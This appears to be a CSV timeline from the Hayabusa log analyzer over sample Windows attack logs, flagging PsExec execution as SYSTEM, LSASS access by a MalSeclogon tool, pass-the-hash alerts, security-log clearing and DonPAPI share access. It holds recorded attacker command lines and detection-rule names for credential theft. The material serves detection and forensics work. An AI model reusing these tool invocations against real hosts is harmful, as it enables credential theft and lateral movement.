2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Windows\PSEXESVC.exe | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000,rules/hayabusa/sysmon/events/11_FileCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,13,low,ResDev,Usage of Sysinternals Tools,,rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,11,low,Exec,PsExec Tool Execution,,rules/sigma/file_event/file_event_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.804 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.804 +09:00,fs03vuln.offsec.lan,17,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC | Process: System | PID: 4 | PGUID: A57649D1-92D1-61A4-EB03-000000000000",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdin | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdout | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stderr | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,18,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\PSEXESVC.exe | LID: 0x3e7 | PID: 540 | PGUID: A57649D1-DB54-61AB-0467-DC0100000000 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdin | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdout | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stderr | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:17.757 +09:00,fs03vuln.offsec.lan,22,info,,DNS Query,Query: fs03vuln | Result: 10.23.42.38; | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000,rules/hayabusa/sysmon/events/22_DNS-Query.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 07:09:13.666 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8ef8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx
2021-12-05 07:09:13.671 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f26,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx
2021-12-05 07:09:13.672 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f3e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx
2021-12-05 07:09:13.673 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f54,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx
2021-12-05 07:09:18.652 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x10e6e929b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx
2021-12-08 02:33:01.409 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: MalSeclogon.exe -p 636 -d 2 | Process: \\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x53ca2 | PID: 8612 | PGUID: 747F3D96-9ACD-61AF-D301-000000000102",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
2021-12-08 02:33:01.474 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: - | LID: 0x3e7 | PID: 7108 | PGUID: 747F3D96-9ACD-61AF-D401-000000000102,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
2021-12-08 02:33:01.485 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\svchost.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: NT AUTHORITY\NETWORK SERVICE | Tgt User: NT AUTHORITY\SYSTEM | Access: 0x100000 | Src PID: 884 | Src PGUID: 747F3D96-0BA4-61B0-1200-000000000102 | Tgt PID: 7108 | Tgt PGUID: 747F3D96-9ACD-61AF-D401-000000000102,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
2021-12-08 02:33:01.616 +09:00,MSEDGEWIN10,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer: - | IP Addr: ::1 | LID: 0x16e3db3 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
2021-12-08 02:33:01.616 +09:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
2021-12-08 02:33:01.616 +09:00,MSEDGEWIN10,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
2021-12-08 02:33:01.636 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: MalSeclogon.exe -p 636 -d 2 -l 1 | Process: \\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: - | LID: 0x16e3db3 | PID: 6072 | PGUID: 747F3D96-9ACD-61AF-D501-000000000102,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
2021-12-08 02:33:01.638 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Tgt Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Src User: MSEDGEWIN10\IEUser | Tgt User: MSEDGEWIN10\IEUser | Access: 0x100000 | Src PID: 8612 | Src PGUID: 747F3D96-9ACD-61AF-D301-000000000102 | Tgt PID: 6072 | Tgt PGUID: 747F3D96-9ACD-61AF-D501-000000000102,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
2021-12-08 02:33:01.680 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: MSEDGEWIN10\IEUser | Tgt User: NT AUTHORITY\SYSTEM | Access: 0x1410 | Src PID: 6072 | Src PGUID: 747F3D96-9ACD-61AF-D501-000000000102 | Tgt PID: 5268 | Tgt PGUID: 747F3D96-9ACD-61AF-D701-000000000102,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
2021-12-08 02:33:01.680 +09:00,MSEDGEWIN10,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
2021-12-08 02:33:01.680 +09:00,MSEDGEWIN10,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
2021-12-09 22:41:50.714 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: hack1,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4624-RottenPotatoNG.evtx"
2021-12-10 03:50:47.980 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
2021-12-10 03:50:55.333 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4d5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4ed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4fe,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d51f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4d5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4ed,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4fe,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d51f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
2021-12-10 03:50:55.349 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d532,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
2021-12-10 03:50:55.958 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
2021-12-10 03:50:55.958 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
2021-12-10 03:50:55.958 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
2021-12-10 03:50:56.005 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
2021-12-10 03:50:56.052 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
2021-12-10 03:50:56.052 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2f10a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
2021-12-10 03:50:56.052 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2f10a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
2021-12-10 03:50:56.099 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
2021-12-10 03:50:56.146 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
2021-12-10 03:51:16.683 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9e8 | User: FS03$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx"
2021-12-12 16:15:28.352 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: hack1,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:56.716 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8723c7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:15:56.716 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8723c7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8723c99,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:56.740 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:56.740 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:56.756 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
